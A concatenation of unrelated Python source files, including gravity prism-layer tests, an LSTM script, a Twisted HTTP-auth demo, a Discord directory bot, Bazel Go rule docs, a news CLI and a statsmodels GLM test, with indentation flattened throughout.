``dummy_layer`` generated, but with two missing prisms: the ``(3, 3)`` and
the ``(2, 1)``.
"""
(easting, northing), surface, reference, density = dummy_layer
layer = prism_layer(
(easting, northing), surface, reference, properties={"density": density}
)
indices = [(3, 3), (2, 1)]
prisms = list(
layer.prism_layer.get_prism((i, j))
for i in range(4)
for j in range(5)
if (i, j) not in indices
)
density = list(
density[i, j] for i in range(4) for j in range(5) if (i, j) not in indices
)
return prisms, density
def test_prism_layer(dummy_layer): # pylint: disable=redefined-outer-name
"""
    Check if a layer of prisms is properly constructed
"""
(easting, northing), surface, reference, _ = dummy_layer
layer = prism_layer((easting, northing), surface, reference)
assert "easting" in layer.coords
assert "northing" in layer.coords
assert "top" in layer.coords
assert "bottom" in layer.coords
npt.assert_allclose(layer.easting, easting)
npt.assert_allclose(layer.northing, northing)
npt.assert_allclose(layer.top, surface)
npt.assert_allclose(layer.bottom, reference)
# Surface below reference on a single point
surface[1, 1] = -1
expected_top = surface.copy()
expected_bottom = np.zeros_like(surface)
expected_top[1, 1], expected_bottom[1, 1] = reference, surface[1, 1]
layer = prism_layer((easting, northing), surface, reference)
assert "easting" in layer.coords
assert "northing" in layer.coords
assert "top" in layer.coords
assert "bottom" in layer.coords
npt.assert_allclose(layer.easting, easting)
npt.assert_allclose(layer.northing, northing)
npt.assert_allclose(layer.top, expected_top)
npt.assert_allclose(layer.bottom, expected_bottom)
def test_prism_layer_invalid_surface_reference(
dummy_layer,
): # pylint: disable=redefined-outer-name
"""
Check if invalid surface and/or reference are caught
"""
coordinates, surface, reference, _ = dummy_layer
# Surface with wrong shape
surface_invalid = np.arange(20, dtype=float)
with pytest.raises(ValueError):
prism_layer(coordinates, surface_invalid, reference)
# Reference with wrong shape
reference_invalid = np.zeros(20)
surface = np.arange(20, dtype=float).reshape(4, 5)
with pytest.raises(ValueError):
prism_layer(coordinates, surface, reference_invalid)
def test_prism_layer_properties(dummy_layer): # pylint: disable=redefined-outer-name
"""
Check passing physical properties to the prisms layer
"""
coordinates, surface, reference, density = dummy_layer
suceptibility = 0 * density + 1e-3
layer = prism_layer(
coordinates,
surface,
reference,
properties={"density": density, "suceptibility": suceptibility},
)
npt.assert_allclose(layer.density, density)
npt.assert_allclose(layer.suceptibility, suceptibility)
def test_prism_layer_no_regular_grid(
dummy_layer,
): # pylint: disable=redefined-outer-name
"""
Check if error is raised if easting and northing are not regular
"""
(easting, northing), surface, reference, _ = dummy_layer
# Easting as non evenly spaced set of coordinates
easting_invalid = easting.copy()
easting_invalid[3] = -22
with pytest.raises(ValueError):
prism_layer(
(easting_invalid, northing),
surface,
reference,
)
# Northing as non evenly spaced set of coordinates
northing_invalid = northing.copy()
northing_invalid[3] = -22
northing[3] = 12.98
with pytest.raises(ValueError):
prism_layer(
(easting, northing_invalid),
surface,
reference,
)
def test_prism_layer_attributes():
"""
Check attributes of the DatasetAccessorPrismsLayer class
"""
easting = np.linspace(1, 3, 5)
northing = np.linspace(7, 10, 4)
reference = 0
surface = np.arange(20, dtype=float).reshape(4, 5)
layer = prism_layer((easting, northing), surface, reference)
assert layer.prism_layer.dims == ("northing", "easting")
assert layer.prism_layer.spacing == (1, 0.5)
assert layer.prism_layer.boundaries == (
easting[0] - 0.25,
easting[-1] + 0.25,
northing[0] - 0.5,
northing[-1] + 0.5,
)
assert layer.prism_layer.size == 20
assert layer.prism_layer.shape == (4, 5)
def test_prism_layer_to_prisms():
"""
Check the _to_prisms() method
"""
coordinates = (np.array([0, 1]), np.array([0, 1]))
reference = np.arange(4).reshape(2, 2)
surface = (np.arange(4) + 10).reshape(2, 2)
layer = prism_layer(coordinates, surface, reference)
expected_prisms = [
[-0.5, 0.5, -0.5, 0.5, 0, 10],
[0.5, 1.5, -0.5, 0.5, 1, 11],
[-0.5, 0.5, 0.5, 1.5, 2, 12],
[0.5, 1.5, 0.5, 1.5, 3, 13],
]
npt.assert_allclose(expected_prisms, layer.prism_layer._to_prisms())
def test_prism_layer_get_prism_by_index():
"""
Check if the right prism is returned after index
"""
coordinates = (np.array([0, 1]), np.array([0, 1]))
reference = np.arange(4).reshape(2, 2)
surface = (np.arange(4) + 10).reshape(2, 2)
layer = prism_layer(coordinates, surface, reference)
expected_prisms = [
[[-0.5, 0.5, -0.5, 0.5, 0, 10], [0.5, 1.5, -0.5, 0.5, 1, 11]],
[[-0.5, 0.5, 0.5, 1.5, 2, 12], [0.5, 1.5, 0.5, 1.5, 3, 13]],
]
for i in range(2):
for j in range(2):
npt.assert_allclose(
layer.prism_layer.get_prism((i, j)), expected_prisms[i][j]
)
def test_nonans_prisms_mask(dummy_layer): # pylint: disable=redefined-outer-name
"""
Check if the mask for nonans prism is correctly created
"""
(easting, northing), surface, reference, _ = dummy_layer
shape = (northing.size, easting.size)
# No nan in top nor bottom
# ------------------------
layer = prism_layer((easting, northing), surface, reference)
expected_mask = np.ones(shape, dtype=bool)
mask = layer.prism_layer._get_nonans_mask()
npt.assert_allclose(mask, expected_mask)
# Nans in top only
# ----------------
layer = prism_layer((easting, northing), surface, reference)
expected_mask = np.ones(shape, dtype=bool)
for index in ((1, 2), (2, 3)):
layer.top[index] = np.nan
expected_mask[index] = False
mask = layer.prism_layer._get_nonans_mask()
npt.assert_allclose(mask, expected_mask)
# Nans in bottom only
# -------------------
layer = prism_layer((easting, northing), surface, reference)
expected_mask = np.ones(shape, dtype=bool)
for index in ((2, 1), (3, 2)):
layer.bottom[index] = np.nan
expected_mask[index] = False
mask = layer.prism_layer._get_nonans_mask()
npt.assert_allclose(mask, expected_mask)
# Nans in top and bottom
# ----------------------
layer = prism_layer((easting, northing), surface, reference)
expected_mask = np.ones(shape, dtype=bool)
for index in ((1, 2), (2, 3)):
layer.top[index] = np.nan
expected_mask[index] = False
for index in ((1, 2), (2, 1), (3, 2)):
layer.bottom[index] = np.nan
expected_mask[index] = False
mask = layer.prism_layer._get_nonans_mask()
npt.assert_allclose(mask, expected_mask)
def test_nonans_prisms_mask_property(
dummy_layer,
): # pylint: disable=redefined-outer-name
"""
Check if the method masks the property and raises a warning
"""
(easting, northing), surface, reference, density = dummy_layer
shape = (northing.size, easting.size)
# Nans in top and property (on the same prisms)
# ---------------------------------------------
expected_mask = np.ones_like(surface, dtype=bool)
indices = ((1, 2), (2, 3))
# Set some elements of surface and density as nans
for index in indices:
surface[index] = np.nan
density[index] = np.nan
expected_mask[index] = False
layer = prism_layer(
(easting, northing), surface, reference, properties={"density": density}
)
# Check if no warning is raised
with warnings.catch_warnings(record=True) as warn:
mask = layer.prism_layer._get_nonans_mask(property_name="density")
assert len(warn) == 0
npt.assert_allclose(mask, expected_mask)
# Nans in top and property (not precisely on the same prisms)
# -----------------------------------------------------------
surface = np.arange(20, dtype=float).reshape(shape)
density = 2670 * np.ones_like(surface)
expected_mask = np.ones_like(surface, dtype=bool)
# Set some elements of surface as nans
indices = ((1, 2), (2, 3))
for index in indices:
surface[index] = np.nan
expected_mask[index] = False
# Set a different set of elements of density as nans
indices = ((2, 2), (0, 1))
for index in indices:
density[index] = np.nan
expected_mask[index] = False
layer = prism_layer(
(easting, northing), surface, reference, properties={"density": density}
)
# Check if warning is raised
with warnings.catch_warnings(record=True) as warn:
mask = layer.prism_layer._get_nonans_mask(property_name="density")
assert len(warn) == 1
assert issubclass(warn[-1].category, UserWarning)
npt.assert_allclose(mask, expected_mask)
@pytest.mark.use_numba
@pytest.mark.parametrize("field", ["potential", "g_z"])
def test_prism_layer_gravity(
field, dummy_layer
): # pylint: disable=redefined-outer-name
"""
Check if gravity method works as expected
"""
coordinates = vd.grid_coordinates((1, 3, 7, 10), spacing=1, extra_coords=30.0)
(easting, northing), surface, reference, density = dummy_layer
layer = prism_layer(
(easting, northing), surface, reference, properties={"density": density}
)
expected_result = prism_gravity(
coordinates,
prisms=layer.prism_layer._to_prisms(),
density=density,
field=field,
)
npt.assert_allclose(
expected_result, layer.prism_layer.gravity(coordinates, field=field)
)
@pytest.mark.use_numba
@pytest.mark.parametrize("field", ["potential", "g_z"])
def test_prism_layer_gravity_surface_nans(
field, dummy_layer, prism_layer_with_holes
): # pylint: disable=redefined-outer-name
"""
Check if gravity method works as expected when surface has nans
"""
coordinates = vd.grid_coordinates((1, 3, 7, 10), spacing=1, extra_coords=30.0)
(easting, northing), surface, reference, density = dummy_layer
# Create one layer that has nans on the surface array
surface_w_nans = surface.copy()
indices = [(3, 3), (2, 1)]
for index in indices:
surface_w_nans[index] = np.nan
layer = prism_layer(
(easting, northing), surface_w_nans, reference, properties={"density": density}
)
# Check if it generates the expected gravity field
prisms, rho = prism_layer_with_holes
npt.assert_allclose(
layer.prism_layer.gravity(coordinates, field=field),
prism_gravity(coordinates, prisms, rho, field=field),
)
@pytest.mark.use_numba
@pytest.mark.parametrize("field", ["potential", "g_z"])
def test_prism_layer_gravity_density_nans(
field, dummy_layer, prism_layer_with_holes
): # pylint: disable=redefined-outer-name
"""
Check if prisms is ignored after a nan is found in density array
"""
coordinates = vd.grid_coordinates((1, 3, 7, 10), spacing=1, extra_coords=30.0)
prisms_coords, surface, reference, density = dummy_layer
# Create one layer that has nans on the density array
indices = [(3, 3), (2, 1)]
for index in indices:
density[index] = np.nan
layer = prism_layer(
prisms_coords, surface, reference, properties={"density": density}
)
# Check if warning is raised after passing density with nans
with warnings.catch_warnings(record=True) as warn:
result = layer.prism_layer.gravity(coordinates, field=field)
assert len(warn) == 1
# Check if it generates the expected gravity field
prisms, rho = prism_layer_with_holes
npt.assert_allclose(
result,
prism_gravity(coordinates, prisms, rho, field=field),
)
|
"""
We feed static features along with dynamical ones into LSTM.
Statical feature is replicated [seqlen] times to be transformed into a "sequence", where value
does not change over time. Kind of "fake" sequence.
"""
import numpy as np
from LSTM.lstm_classifier import LSTMClassifier
# general parameters
lstm_nepochs = 20
# load the dataset
print 'Loading the dataset..'
static_train = np.load('/storage/hpc_anna/GMiC/Data/syn_lstm_wins/train_static.npy')
dynamic_train = np.load('/storage/hpc_anna/GMiC/Data/syn_lstm_wins/train_dynamic.npy')
static_val = np.load('/storage/hpc_anna/GMiC/Data/syn_lstm_wins/test_static.npy')
dynamic_val = np.load('/storage/hpc_anna/GMiC/Data/syn_lstm_wins/test_dynamic.npy')
labels_train = np.load('/storage/hpc_anna/GMiC/Data/syn_lstm_wins/train_labels.npy')
labels_val = np.load('/storage/hpc_anna/GMiC/Data/syn_lstm_wins/test_labels.npy')
# transform static features into "fake" sequences
dynamized_static_train = np.zeros((static_train.shape[0], static_train.shape[1], dynamic_train.shape[2]))
for i in range(static_train.shape[0]):
dynamized_static_train[i, :, :] = np.tile(static_train[i, :], (dynamic_train.shape[2], 1)).T
dynamized_static_val = np.zeros((static_val.shape[0], static_val.shape[1], dynamic_val.shape[2]))
for i in range(static_val.shape[0]):
dynamized_static_val[i, :, :] = np.tile(static_val[i, :], (dynamic_val.shape[2], 1)).T
# meld dynamized static and dynamic features together
all_train = np.concatenate((dynamized_static_train, dynamic_train), axis=1)
all_val = np.concatenate((dynamized_static_val, dynamic_val), axis=1)
# dynamic data with LSTM
lstmcl = LSTMClassifier(2000, 0.5, 'adagrad', lstm_nepochs)
model_pos, model_neg = lstmcl.train(all_train, labels_train)
print "LSTM with dynamized static and dynamic features on validation set: %.4f" % lstmcl.test(model_pos, model_neg, all_val, labels_val)
|
#!/usr/bin/env python2.7
import os
import argparse
import syntax_tree as ast
from parse import *
from os.path import join as pjoin
import tac
def main(*args, **kwargs):
default_file = "single_function.x"
default_file = "simple_0.x"
filepath = os.path.dirname(os.path.realpath(__file__))
argument_parser = argparse.ArgumentParser()
argument_parser.add_argument("--input", "-i", default = pjoin(filepath, "../tests/lang/" + default_file))
args = argument_parser.parse_args()
data = open(args.input).read()
try:
program = parse(data)
except ParseError as e:
        print(e)
        raise
program.make_tables()
try:
program.sema()
except ast.SemaError as e:
print(e)
print(e.ast.end_token.highlight(5, 5))
raise
except KeyError as e:
print(e)
#print(e.ast.start_token.highlight(5, 5))
print(e.ast.end_token.highlight(5, 5))
raise
t = program.make_tac(tac.TacState())
for x in t:
if isinstance(x, (tac.Label, tac.StartFunc, tac.EndFunc)):
print(x)
else:
print("\t{}".format(x))
if isinstance(x, tac.EndFunc):
print("")
graph = program.output_graph("out.png")
if __name__ == "__main__":
main()
|
# You can run this .tac file directly with:
# twistd -ny httpauth.tac
from twisted.web2 import channel, resource, http, responsecode, server
from twisted.web2.auth.interfaces import IAuthenticatedRequest, IHTTPUser
class ProtectedResource(resource.Resource):
"""
A resource that is protected by HTTP Auth
"""
addSlash = True
def render(self, req):
"""
I adapt C{req} to an L{IAuthenticatedRequest} before using the
avatar to return a personalized message.
"""
avatar = IAuthenticatedRequest(req).avatar
return http.Response(
responsecode.OK,
stream=("Hello %s, you've successfully accessed "
"a protected resource." % (avatar.username,)))
from twisted.web2.auth import digest, basic, wrapper
from twisted.cred.portal import Portal
from twisted.cred import checkers
import credsetup
#
# Create the portal with our realm that knows about the kind of avatar
# we want.
#
portal = Portal(credsetup.HTTPAuthRealm())
#
# Create a checker that knows about the type of backend we want to use
# and that knows about the ICredentials we get back from our
# ICredentialFactories. And tell our portal to use it.
#
checker = checkers.InMemoryUsernamePasswordDatabaseDontUse(guest='guest123')
portal.registerChecker(checker)
#
# Set up our HTTPAuthResource, we have to tell it the root of the resource
# hierarchy we want to protect, as well as the credential factories we want
# to support, the portal we want to use for logging in, and the interfaces
# that IAuthenticatedRequest.avatar to may implement.
#
root = wrapper.HTTPAuthResource(ProtectedResource(),
(basic.BasicCredentialFactory('My Realm'),
digest.DigestCredentialFactory('md5',
'My Realm')),
portal, (IHTTPUser,))
site = server.Site(root)
# Start up the server
from twisted.application import service, strports
application = service.Application("HTTP Auth Demo")
s = strports.service('tcp:8080', channel.HTTPFactory(site))
s.setServiceParent(application)
|
import random
import string
from model.contact import Contact
import os.path
import jsonpickle
import getopt
import sys
__author__ = "Grzegorz Holak"
try:
opts, args = getopt.getopt(sys.argv[1:], "n:f:", ["number of Contacts", "file"])
except getopt.GetoptError as err:
    print(err)  # getopt has no usage() helper; report the parse error instead
sys.exit(2)
n = 5
f = "data/contacts.json"
for o, a in opts:
if o == "-n":
n = int(a)
elif o == "-f":
f = a
def random_string(prefix, max_len):
symbols = string.ascii_letters + string.digits + " "
# + string.punctuation to not fail tests as we know that it is not working correctly with this chars
return prefix + "".join([random.choice(symbols) for i in range(random.randrange(max_len))])
def random_email(prefix, max_len_name, max_len_domain):
symbols = string.ascii_letters + string.digits
name = "".join([random.choice(symbols) for i in range(random.randrange(max_len_name))])
domain = "".join([random.choice(symbols) for i in range(random.randrange(max_len_domain))])
end = "".join([random.choice(string.ascii_lowercase) for i in range(1, 3)])
return prefix + "_" + name + "@" + domain + "." + end
def random_phone(prefix, max_len):
symbols = string.digits
return prefix + "".join([random.choice(symbols) for i in range(random.randrange(max_len))])
testdata = [
Contact(first_name=random_string("name", 10), last_name=random_string("lastname", 20)
, email=random_email("email1", 10, 10), email2=random_email("email2", 10, 15)
, email3=random_email("e3", 15, 21), address=random_string("address", 50)
, mobile_phone=random_phone("mob", 10), work_phone=random_phone("work", 10)
, home_phone=random_phone("home", 10), home_phone2=random_phone("home2", 11))
for i in range(n)
]
file = os.path.join(os.path.dirname(os.path.abspath(__file__)), "..", f)
with open(file, "w") as out:
jsonpickle.set_encoder_options("json", indent=2)
out.write(jsonpickle.encode(testdata))
|
from discord.ext import commands, tasks
import core.config
from apps.base import Query
from apps.erp.models import EmployeeTable
from apps.directory.queries import ad_query
from apps.directory.utils import email_to_ad, pretty_ad_user, directory_emojis, ad_user_to_list
class DirectoryTasks(commands.Cog, name='directory_tasks'):
def __init__(self, bot):
self.bot = bot
self.directory_task.start()
self.channel = self.bot.get_channel(core.config.LOA_CHANNEL)
@tasks.loop(seconds=5.0)
async def directory_task(self):
loa_email = Query('email_table').filter('local_read', '0').filter_like('recipient', 'itloa').query()
loa_list = email_to_ad(loa_email)
for email in loa_list:
employee = self.email_to_employee(email)
Query('email_table').update_by_key(email['key'], [('local_read', 1)])
if employee:
ad_acts = self.employee_ad_search(employee)
if len(ad_acts) == 1:
msg = await self.channel.send(embed=pretty_ad_user(ad_acts, employee['command']))
emoji = directory_emojis[employee['command'].lower()]
await msg.add_reaction(emoji)
elif len(ad_acts) > 1:
await self.channel.send('Multiple accounts were found, please select from the below')
for account in ad_acts:
msg = await self.channel.send(embed=pretty_ad_user(account, employee['command']))
emoji = directory_emojis[employee['command'].lower()]
await msg.add_reaction(emoji)
elif not ad_acts:
msg = ''
await self.channel.send(f'No AD account for {employee["first"].capitalize()} {employee["last"].capitalize()} found')
else:
await self.channel.send(f'Employee can not be found (Incorrect Email Format?):\nEEID Provided: {email["id"]}\nCommand Provided: {email["command"]}')
@staticmethod
def email_to_employee(email):
if email['id']:
employee = EmployeeTable().filter('id', email['id'][0]).query()[0]
employee = {'first': employee[1], 'middle': employee[2], 'last': employee[4], 'command': email['command']}
return employee
@staticmethod
def employee_ad_search(employee):
accounts = ad_query(employee['first'], employee['last'])
return accounts
|
from test_inference import create_test_data, get_predictions  # assuming get_predictions is defined alongside create_test_data
from save_load import load_model
model, tokenizer = load_model()
test_sentence_1 = "ENTER FIRST SENTENCE HERE"
test_sentence_2 = "ENTER SECOND SENTENCE HERE"
test_sentence_pairs = [(test_sentence_1, test_sentence_2)]
max_seq_len = 237
test_data_1, test_data_2 = create_test_data(tokenizer=tokenizer, test_sentences_pair=test_sentence_pairs,
                                            max_sequence_length=max_seq_len)
get_predictions(test_data_1, test_data_2, model)
|
import unittest
import os, sys
from numpy import ndarray
from lab.data import Data, DataRandom
from lab.target import TGAlpha
class DataClassTests(unittest.TestCase):
def setUp(self):
self.data = Data()
self.dataStoragePath = "data"
# return super().setUp()
def test_instantiation(self):
self.assertIsInstance(self.data, Data, "it has wrong type")
def test_setArrayOfIntegersAsX(self):
self.data.setX([[1, 2, 3, 4, 5], [1, 2, 3, 4, 5]])
self.assertIsInstance(self.data, Data, "does not accept array of integers")
def test_typeConvertionForX(self):
self.data.setX([[1, 2, 3], [1, 2, 3]])
self.assertIsInstance(
self.data.x[1, 1],
float,
"the type of the data element is different than `float`",
)
def test_stringInArrayAsX(self):
with self.assertRaises(ValueError):
self.data.setX([[1, "a", 3], [1, 2, 3]])
def test_oneDimentionalArrayAsX(self):
with self.assertRaises(Exception):
self.data.setX([1, 2, 3, 4, 5, 6])
def test_storeInFile(self):
url = self.data.save(self.dataStoragePath)
self.assertGreater(len(url), 1, "url to file empty")
size = os.stat(url).st_size
self.assertGreater(size, 1, "file empty")
def test_readFromFile(self):
x = [[100.0, 200.0, 300.0], [1.0, 2.0, 3.0]]
self.data.setX(x)
url = self.data.save(self.dataStoragePath)
d = Data()
d.read(url)
self.assertListEqual(
list(self.data.x.flatten()),
list(d.x.flatten()),
"the data is damaged during store/read operation",
)
def test_makeTarget(self):
self.data.setX([[1, 2, 3], [2, 2, 4], [3, 4, 2]])
tg = TGAlpha()
self.data.makeTarget(tg)
self.assertIsInstance(self.data.y, ndarray, "target is not an array")
def test_targetValues(self):
self.data.setX([[1, 2, 3], [2, 2, 4], [3, 4, 2]])
tg = TGAlpha()
self.data.makeTarget(tg)
self.assertListEqual(
list(set(self.data.y.flatten())),
[0.0, 1.0],
"target class not in set {0., 1.}",
)
class RandomDataClassTests(unittest.TestCase):
def setUp(self):
self.data = DataRandom()
def test_instantiationWithDefaults(self):
self.assertEqual(self.data.x.shape[0], 10000, "wrong observations number")
self.assertEqual(self.data.x.shape[1], 10, "wrong features number")
if __name__ == "__main__":
unittest.main()
|
import pandas as pd
import os, progressbar
from Bio import SeqIO
def collectSeq(proteome):
seqCollection = []
for seqRecord in SeqIO.parse(proteome, format='fasta'):
seqCollection.append((seqRecord.id, str(seqRecord.seq)))
return seqCollection
def createSEQ(resPath, seqTuple):
f = open(os.path.join(resPath,'{}.seq'.format(seqTuple[0])), mode='w')
f.write('{} N N 7 298 0.1 {}\n'.format(seqTuple[0], seqTuple[1]))
f.close()
def collect_aggScore(tangoTable):
proteinID = tangoTable.split('/')[-1].replace('.txt', '')
tmp = pd.read_csv(tangoTable, sep='\t')
agg_score = sum(tmp['Aggregation']) / len(tmp)
return proteinID, agg_score
def collect_aggTable(tangoTable):
proteinID = tangoTable.split('/')[-1].replace('.txt', '')
tmp = pd.read_csv(tangoTable, sep='\t')
return tmp
|
"""
["Make variable"]: https://docs.bazel.build/versions/master/be/make-variables.html
[Bourne shell tokenization]: https://docs.bazel.build/versions/master/be/common-definitions.html#sh-tokenization
[Gazelle]: https://github.com/bazelbuild/bazel-gazelle
[GoArchive]: /go/providers.rst#GoArchive
[GoLibrary]: /go/providers.rst#GoLibrary
[GoPath]: /go/providers.rst#GoPath
[GoSource]: /go/providers.rst#GoSource
[build constraints]: https://golang.org/pkg/go/build/#hdr-Build_Constraints
[cc_library deps]: https://docs.bazel.build/versions/master/be/c-cpp.html#cc_library.deps
[cgo]: http://golang.org/cmd/cgo/
[config_setting]: https://docs.bazel.build/versions/master/be/general.html#config_setting
[data dependencies]: https://docs.bazel.build/versions/master/build-ref.html#data
[goarch]: /go/modes.rst#goarch
[goos]: /go/modes.rst#goos
[mode attributes]: /go/modes.rst#mode-attributes
[nogo]: /go/nogo.rst#nogo
[pure]: /go/modes.rst#pure
[race]: /go/modes.rst#race
[msan]: /go/modes.rst#msan
[select]: https://docs.bazel.build/versions/master/be/functions.html#select
[shard_count]: https://docs.bazel.build/versions/master/be/common-definitions.html#test.shard_count
[static]: /go/modes.rst#static
[test_arg]: https://docs.bazel.build/versions/master/user-manual.html#flag--test_arg
[test_filter]: https://docs.bazel.build/versions/master/user-manual.html#flag--test_filter
[test_env]: https://docs.bazel.build/versions/master/user-manual.html#flag--test_env
[test_runner_fail_fast]: https://docs.bazel.build/versions/master/command-line-reference.html#flag--test_runner_fail_fast
[write a CROSSTOOL file]: https://github.com/bazelbuild/bazel/wiki/Yet-Another-CROSSTOOL-Writing-Tutorial
[bazel]: https://pkg.go.dev/github.com/bazelbuild/rules_go/go/tools/bazel?tab=doc
[go_library]: #go_library
[go_binary]: #go_binary
[go_test]: #go_test
[go_path]: #go_path
[go_source]: #go_source
[go_test]: #go_test
[Examples]: examples.md#examples
[Defines and stamping]: defines_and_stamping.md#defines-and-stamping
[Stamping with the workspace status script]: defines_and_stamping.md#stamping-with-the-workspace-status-script
[Embedding]: embedding.md#embedding
[Cross compilation]: cross_compilation.md#cross-compilation
[Platform-specific dependencies]: platform-specific_dependencies.md#platform-specific-dependencies
# Core Go rules
These are the core go rules, required for basic operation. The intent is that these rules are
sufficient to match the capabilities of the normal go tools.
## Additional resources
- ["Make variable"]
- [Bourne shell tokenization]
- [Gazelle]
- [GoArchive]
- [GoLibrary]
- [GoPath]
- [GoSource]
- [build constraints]:
- [cc_library deps]
- [cgo]
- [config_setting]
- [data dependencies]
- [goarch]
- [goos]
- [mode attributes]
- [nogo]
- [pure]
- [race]
- [msan]
- [select]:
- [shard_count]
- [static]
- [test_arg]
- [test_filter]
- [test_env]
- [test_runner_fail_fast]
- [write a CROSSTOOL file]
- [bazel]
------------------------------------------------------------------------
Introduction
------------
Three core rules may be used to build most projects: [go_library], [go_binary],
and [go_test].
[go_library] builds a single package. It has a list of source files
(specified with `srcs`) and may depend on other packages (with `deps`).
Each [go_library] has an `importpath`, which is the name used to import it
in Go source files.
[go_binary] also builds a single `main` package and links it into an
executable. It may embed the content of a [go_library] using the `embed`
attribute. Embedded sources are compiled together in the same package.
Binaries can be built for alternative platforms and configurations by setting
`goos`, `goarch`, and other attributes.
[go_test] builds a test executable. Like tests produced by `go test`, this
consists of three packages: an internal test package compiled together with
the library being tested (specified with `embed`), an external test package
compiled separately, and a generated test main package.
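The following sketch wires the three rules together in a single BUILD file. The
package layout, file names, and import path are hypothetical and shown only for
illustration:

```starlark
load("@io_bazel_rules_go//go:def.bzl", "go_binary", "go_library", "go_test")

go_library(
    name = "greeter",
    srcs = ["greeter.go"],
    importpath = "example.com/hello/greeter",  # hypothetical import path
)

go_binary(
    name = "hello",
    srcs = ["main.go"],
    deps = [":greeter"],
)

go_test(
    name = "greeter_test",
    srcs = ["greeter_test.go"],
    embed = [":greeter"],  # internal test package compiled with the library
)
```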
Rules
-----
"""
load("//go/private/rules:library.bzl", _go_library = "go_library")
load("//go/private/rules:binary.bzl", _go_binary = "go_binary")
load("//go/private/rules:test.bzl", _go_test = "go_test")
load("//go/private/rules:source.bzl", _go_source = "go_source")
load("//go/private/tools:path.bzl", _go_path = "go_path")
go_library = _go_library
go_binary = _go_binary
go_test = _go_test
go_source = _go_source
go_path = _go_path
|
import sys
from example_pkg import YoDude
def main():
print(f"command_line sys.argv={sys.argv}")
s: str = "hi there"
if len(sys.argv) > 1:
s = " ".join(sys.argv[1:])
yd = YoDude(s)
yd.hello()
|
import click
from typing import List
from gonews.utils import GoNews
news = GoNews()
@click.group('cli')
def cli():
pass
@cli.command('top-stories')
@click.option('--max-stories', '-ms', type=int, default=None, required=False, help='Max number of stories to retrieve')
def top_stories(max_stories: int = None):
"""Print current top stories"""
news.top_stories(max_stories=max_stories)
@cli.command('top-stories-by-location')
@click.option('--city', '-c', type=str, required=True, help='City name')
@click.option('--state', '-s',
type=click.Choice(list(news.states.keys())+list(news.states.values()), case_sensitive=False),
required=True, help='State name. NOTE: Not case sensitive')
@click.option('--max-stories', '-ms', type=int, default=None, required=False, help='Max number of stories to retrieve')
def top_stories_by_location(city:str, state: str, max_stories: int = None):
"""Print current top stories for city, state"""
news.top_stories_by_location(city, state, max_stories=max_stories)
@cli.command('search-stories')
@click.option('--query', '-q', type=str, required=True, help='Exact search term')
@click.option('--has-word', '-hw', type=str, required=False, multiple=True, help='Stories should have given word')
@click.option('--exclude-word', '-ew', type=str, required=False, multiple=True,
help='Stories should not contain given word')
@click.option('--timeframe', '--t', type=click.Choice(['1d', '7d', '14d', '30d', '1y']), required=False, default='1d',
help='Stories from this timeframe')
@click.option('--max-stories', '-ms', type=int, default=None, required=False, help='Max number of stories to retrieve')
def search_stories(query: str, has_word: List[str], exclude_word: List[str], timeframe: str, max_stories: int = None):
"""Print top stories based on search"""
has_word = list(has_word)
exclude_word = list(exclude_word)
news.search_stories(query, has_words=has_word, exclude_words=exclude_word, when=timeframe, max_stories=max_stories)
if __name__ == '__main__':
cli()
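# Example invocations, sketched under the assumption that this file is run directly
# (the file name below is hypothetical; the command and option names come from the
# click decorators above):
#   python gonews_cli.py top-stories --max-stories 5
#   python gonews_cli.py top-stories-by-location -c Denver -s Colorado
#   python gonews_cli.py search-stories -q "python" -hw release -ew rumor --t 7d --max-stories 10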
|
# third party
import pytest
# syft absolute
import syft as sy
from syft.util import get_root_data_path
@pytest.mark.vendor(lib="statsmodels")
def test_glm(root_client: sy.VirtualMachineClient) -> None:
# stdlib
import os
import re
import shutil
import urllib.request
# third party
import pandas as pd
import statsmodels
FAMILY = [
statsmodels.genmod.families.Binomial,
statsmodels.genmod.families.Gamma,
statsmodels.genmod.families.Gaussian,
statsmodels.genmod.families.InverseGaussian,
statsmodels.genmod.families.NegativeBinomial,
statsmodels.genmod.families.Poisson,
statsmodels.genmod.families.Tweedie,
]
UNNECESSARY_STR = r"Time(.*)(?=Pearson)|Date(.*)(?=Deviance)"
sy.load("pandas")
sy.load("statsmodels")
# download data
csv_file = "mort_match_nhis_all_years.csv"
zip_file = f"{csv_file}.zip"
url = f"https://datahub.io/madhava/mort_match_nhis_all_years/r/{zip_file}"
data_path = f"{get_root_data_path()}/CDC"
zip_path = f"{data_path}/{zip_file}"
csv_path = f"{data_path}/{csv_file.upper()}"
if not os.path.exists(zip_path):
os.makedirs(data_path, exist_ok=True)
urllib.request.urlretrieve(url, zip_path)
if not os.path.exists(csv_path):
shutil.unpack_archive(zip_path, data_path)
assert os.path.exists(csv_path)
# load data
df = pd.read_csv(csv_path)
df = df.head(100)
df_ptr = df.send(root_client)
# Drop any missing values in the dataset (those under 18)
df = df.dropna(subset=["MORTSTAT"])
df_ptr = df_ptr.dropna(subset=["MORTSTAT"])
# Keep only the eligible portion
df = df[df["ELIGSTAT"] == 1]
df_ptr = df_ptr[df_ptr["ELIGSTAT"] == 1]
# Ignore people > 80
df = df[df["AGE_P"] <= 80]
df_ptr = df_ptr[df_ptr["AGE_P"] <= 80]
# A person is alive if MORTSTAT==0
df["is_alive"] = df["MORTSTAT"] == 0
df_ptr["is_alive"] = df_ptr["MORTSTAT"] == 0
# Assign a helpful column for sex (0==male, 1==female)
df["sex"] = "male"
df_ptr["sex"] = "male"
# df.loc[df["SEX"] == 2, "sex"] = "female"
# explanatory variable
x = df["AGE_P"]
x_ptr = df_ptr["AGE_P"]
# add constant
_x = statsmodels.api.add_constant(x)
_x_ptr = root_client.statsmodels.api.add_constant(x_ptr)
# dependent variable
_y = df["is_alive"]
_y_ptr = df_ptr["is_alive"]
# test all possible combinations of families and links
for family in FAMILY:
for link in family.links:
model = statsmodels.genmod.generalized_linear_model.GLM(
_y, _x, family=family(link=link())
)
result = model.fit()
summary = result.summary().as_csv()
remote_model = root_client.statsmodels.genmod.generalized_linear_model.GLM(
_y_ptr, _x_ptr, family=family(link=link())
)
remote_result = remote_model.fit()
# `get` corresponds to `summary().as_csv()`
remote_summary = remote_result.get()
            # remove unnecessary strings such as processing time and date
summary = re.sub(UNNECESSARY_STR, "", summary)
remote_summary = re.sub(UNNECESSARY_STR, "", remote_summary)
assert summary == remote_summary
|
# -*- coding: utf-8 -*-
"""
for installing with pip
"""
from distutils.core import setup
from setuptools import find_packages
setup(
name='mu3',
version='0.0.1',
author='Mark V',
author_email='noreply.mail.nl',
packages=find_packages(),
include_package_data=True,
url='git+https://bitbucket.org/mverleg/mu3',
